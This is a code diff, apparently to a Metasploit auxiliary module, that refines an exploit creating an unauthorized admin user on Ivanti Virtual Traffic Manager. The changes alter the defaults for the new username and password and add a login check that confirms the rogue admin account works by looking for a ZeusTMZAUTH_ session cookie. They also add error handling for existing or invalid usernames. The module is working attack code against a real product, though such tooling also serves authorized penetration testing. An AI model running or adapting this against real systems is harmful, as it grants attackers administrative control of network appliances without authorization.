Improved error handling

Improved error handling

Author: h4x-x0r

modules/auxiliary/admin/http/ivanti_vtm_admin.rb

@@ -39,8 +39,8 @@ def initialize(info = {})
 
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/']),
-      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username]),
-      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
+      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username.gsub('.', '_')]),
+      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(12)]),
     ])
   end
 
@@ -91,11 +91,34 @@ def run
     if title_tag
       title_text = title_tag.text.strip
       if title_text == '2'
-        store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
-        print_good("New admin user was successfully added:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
-        print_good("Login at: https://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}apps/zxtm/login.cgi")
+        print_status('Request to add new admin user sent, verifying...')
+
+        form = Rex::MIME::Message.new
+        form.add_part('form', nil, nil, 'form-data; name="_form_submitted"')
+        form.add_part(datastore['NEW_USERNAME'], nil, nil, 'form-data; name="form_username"')
+        form.add_part(datastore['NEW_PASSWORD'], nil, nil, 'form-data; name="form_password"')
+        form.add_part('Login', nil, nil, 'form-data; name="form_submit"')
+
+        res = send_request_cgi(
+          {
+            'method' => 'POST',
+            'uri' => normalize_uri(target_uri.path, 'apps', 'zxtm', 'login.cgi'),
+            'ctype' => "multipart/form-data; boundary=#{form.bound}",
+            'data' => form.to_s
+          }
+        )
+        if res && res.code == 302 && res.headers.key?('Set-Cookie') && res.headers['Set-Cookie'].include?('ZeusTMZAUTH_')
+          store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
+          print_good("New admin user was successfully added:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
+          print_good("Login at: https://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}apps/zxtm/login.cgi")
+        end
+
+      elsif title_text == '0' && html.to_s.include?('ERROR: Specified user already exists')
+        fail_with(Failure::BadConfig, "Specified user already exists. Specify a different user name with 'set NEW_USERNAME <USER>'.")
+      elsif title_text == '0' && html.to_s.include?('ERROR: Username must contain only: letters, numbers,')
+        fail_with(Failure::BadConfig, "Specified username is invalid. Username must contain only letters, numbers, underscores (_), and hyphens (-). Specify a different user name with 'set NEW_USERNAME <USER>'.")
       else
-        fail_with(Failure::UnexpectedReply, 'Unexpected string found inside the title tag: ' + title_text)
+        fail_with(Failure::NotVulnerable, 'Unexpected string found inside the title tag: ' + title_text)
       end
     else
       fail_with(Failure::UnexpectedReply, 'title tag not found.')